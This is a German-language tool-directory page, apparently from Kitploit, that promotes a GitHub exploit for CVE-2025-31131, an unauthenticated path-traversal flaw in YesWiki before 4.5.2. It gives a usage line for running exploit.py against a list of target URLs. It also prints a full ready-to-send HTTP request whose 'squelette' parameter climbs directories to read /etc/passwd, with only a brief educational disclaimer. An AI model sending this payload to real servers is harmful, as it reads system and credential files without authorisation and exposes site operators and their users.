Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-31131 — YesWiki ist ein in PHP geschriebenes Wiki-System. Der Parameter `squelette` ist anfällig für Path-Traversal-Angriffe, die Lesezugriff auf beliebige Dateien auf dem Server ermöglichen. | Kitploit
Tools/GitHubGitHub/muhammadwaseem29/cve-2025-31131
SchwachstellenanalyseExploitationInformationsbeschaffungWebsicherheitPenetrationstestsLernen & Bildung
GitHubmuhammadwaseem29/cve-2025-31131

CVE-2025-31131

YesWiki ist ein in PHP geschriebenes Wiki-System. Der Parameter `squelette` ist anfällig für Path-Traversal-Angriffe, die Lesezugriff auf beliebige Dateien auf dem Server ermöglichen.

Repository anzeigenWebseite
11vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-31131 - YesWiki < 4.5.2 Path-Traversal-Exploit

Dies ist ein nicht authentifizierter Path-Traversal-Exploit, der auf YesWiki-Versionen vor 4.5.2 abzielt. Die Sicherheitslücke existiert im Parameter squelette, der das Lesen beliebiger Dateien vom Server ermöglicht.

Details zur Sicherheitslücke

  • CVE-ID: CVE-2025-31131
  • Betroffene Software: YesWiki < 4.5.2
  • Typ: Path Traversal
  • Schweregrad: Hoch (CVSS: 8.6)
  • Referenz: https://github.com/advisories/GHSA-w34w-fvp3-68xm

Verwendung

python3 exploit.py -l urls.txt image

Hier ist eine zweite Methode, um das manuell mit Burp auszunutzen:

root@kitploit:~
GET /?UrkCEO/edit&theme=margot&squelette=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&style=margot.css HTTP/1.1
Host: target.com
Sec-Ch-Ua: "Chromium";v="133", "Not(A:Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

image

Haftungsausschluss: Dies dient ausschließlich zu Bildungszwecken.

Tool herunterladen